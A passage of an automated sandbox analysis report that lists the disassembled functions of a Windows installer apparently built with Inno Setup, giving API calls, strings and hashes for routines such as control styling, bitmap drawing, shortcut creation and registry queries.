                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                          • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                          • API String ID: 2323315520-3614243559
                                                                                                                                                          • Opcode ID: 38fef4e5117ff1ef5e4aad51512f696ef6634172072b968ee68f79627089ce7d
                                                                                                                                                          • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                                                                                          • Opcode Fuzzy Hash: 38fef4e5117ff1ef5e4aad51512f696ef6634172072b968ee68f79627089ce7d
                                                                                                                                                          • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                                                                          • 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                                                                          • 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                                                                          • 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                                                                          • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                                                                          • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                                                                          • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                                                                          • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                                                                          • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                                                                          • 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                                                                          • 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                                                                          • 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                                                                          • 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1381628555-0
                                                                                                                                                          • Opcode ID: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
                                                                                                                                                          • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                                                                                          • Opcode Fuzzy Hash: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
                                                                                                                                                          • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00496A98 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 251synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000,004971F1,?,00000000), ref: 00496B1B
                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000), ref: 00496B2E
                                                                                                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000), ref: 00496B3E
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00496B5F
                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000), ref: 00496B6F
                                                                                                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                                          • String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
                                                                                                                                                          • API String ID: 2000705611-2592930226
                                                                                                                                                          • Opcode ID: 392a5d1fef952839e95e9b978f1a743527d762900184a641eacf38a5eef72624
                                                                                                                                                          • Instruction ID: 4c11abcdbfb461b7d647ba7693d2f2a167619218498683e16ce031b9e504508c
                                                                                                                                                          • Opcode Fuzzy Hash: 392a5d1fef952839e95e9b978f1a743527d762900184a641eacf38a5eef72624
                                                                                                                                                          • Instruction Fuzzy Hash: 2F91C534B042449FDF11EBA5C852BAF7BA5EB49308F524477F800AB682D63CAC01CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00459EF8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0045A1B4,?,?,?,?,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 0045A066
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                          • API String ID: 1452528299-3112430753
                                                                                                                                                          • Opcode ID: 6067df2a702a45cb020847823167e249e23145af7fd1c160593c73af87b23520
                                                                                                                                                          • Instruction ID: 585700f695afdb727b25681db045cd46e0715bcc6ef46f3516a2bde87356df66
                                                                                                                                                          • Opcode Fuzzy Hash: 6067df2a702a45cb020847823167e249e23145af7fd1c160593c73af87b23520
                                                                                                                                                          • Instruction Fuzzy Hash: 6871B030B046045BCB01EF6988827AE7BA4AF49715F50856BFC01DB383DB7C9E5D875A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045C3E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32 ref: 0045C3FA
                                                                                                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C41A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C427
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C434
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C442
                                                                                                                                                            • Part of subcall function 0045C2E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C387,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C361
                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C4FB
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C504
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                                          • API String ID: 59345061-4263478283
                                                                                                                                                          • Opcode ID: 1ed38a4e901c2ea8dd20ace539c31e4d5a72e922b331e0779383c5f16a4cf9fe
                                                                                                                                                          • Instruction ID: 2324ee668b9984b5a17f8dfa8b7107ea71667c1f280dda851e0a9f9f44b51649
                                                                                                                                                          • Opcode Fuzzy Hash: 1ed38a4e901c2ea8dd20ace539c31e4d5a72e922b331e0779383c5f16a4cf9fe
                                                                                                                                                          • Instruction Fuzzy Hash: F85174B1900308EFDB10DFD9C881BAEB7B8EB4D715F14806AF905B7241D6789A45CFA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 359944910-0
                                                                                                                                                          • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                          • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                                                                                          • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                          • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00471C4C Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 335COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471E04
                                                                                                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471F07
                                                                                                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471F1D
                                                                                                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471F42
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                                          • API String ID: 971782779-3668018701
                                                                                                                                                          • Opcode ID: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
                                                                                                                                                          • Instruction ID: 2c76df8ba625d9f67a49e4dde8e83c51fb287a1c504e4bc7131b70b5a5e3fea9
                                                                                                                                                          • Opcode Fuzzy Hash: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
                                                                                                                                                          • Instruction Fuzzy Hash: B3D13374A001499FDB11EFA9D981BDEB7F5AF08304F50806AF904B7392C778AE45CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00455A90 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 756FE550.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AD2
                                                                                                                                                          • 756FE550.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AF8
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00455C4B
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00455D49
                                                                                                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                          Strings
                                                                                                                                                          • IPropertyStore::Commit, xrefs: 00455C9B
                                                                                                                                                          • IPersistFile::Save, xrefs: 00455D1A
                                                                                                                                                          • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00455CBC
                                                                                                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00455C82
                                                                                                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00455C30
                                                                                                                                                          • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00455BE1
                                                                                                                                                          • CoCreateInstance, xrefs: 00455B03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$E550Free$AllocByteCharMultiWide
                                                                                                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                                                                                          • API String ID: 2445757755-2511345603
                                                                                                                                                          • Opcode ID: c40b4a6482fd02c2705c86a684847c75d80b38a48eee8cad0107ee061894c800
                                                                                                                                                          • Instruction ID: 56f298b1da12e5b408e16fbb21681473d63e285224e10069650d818475d95191
                                                                                                                                                          • Opcode Fuzzy Hash: c40b4a6482fd02c2705c86a684847c75d80b38a48eee8cad0107ee061894c800
                                                                                                                                                          • Instruction Fuzzy Hash: 0CA16171A00604AFDB41DFA9C895BAE77F8EF09305F144066F904E7262DB78DD48CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00453DA0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,?,00000000,?,00000000,00454039,?,0045A38A,00000003,00000000,00000000,00454070), ref: 00453EB9
                                                                                                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F3D
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F6C
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E10
                                                                                                                                                          • RegOpenKeyEx, xrefs: 00453E3C
                                                                                                                                                          • , xrefs: 00453E2A
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DD7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                          • API String ID: 2812809588-1577016196
                                                                                                                                                          • Opcode ID: e44d10270567a9c66430bb347a0a6bf6bb9a94d7d5836d51e5ed894c85649251
                                                                                                                                                          • Instruction ID: a80e1c39b7be5a0450aefd5b2d64ed399e87e9650e944d0b03df369acb03390b
                                                                                                                                                          • Opcode Fuzzy Hash: e44d10270567a9c66430bb347a0a6bf6bb9a94d7d5836d51e5ed894c85649251
                                                                                                                                                          • Instruction Fuzzy Hash: DF912371E04208ABDB11DF95D942BDFB7F8EB48746F10406BF900F7282D6789E498B69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00458C78 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00458B84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D1F
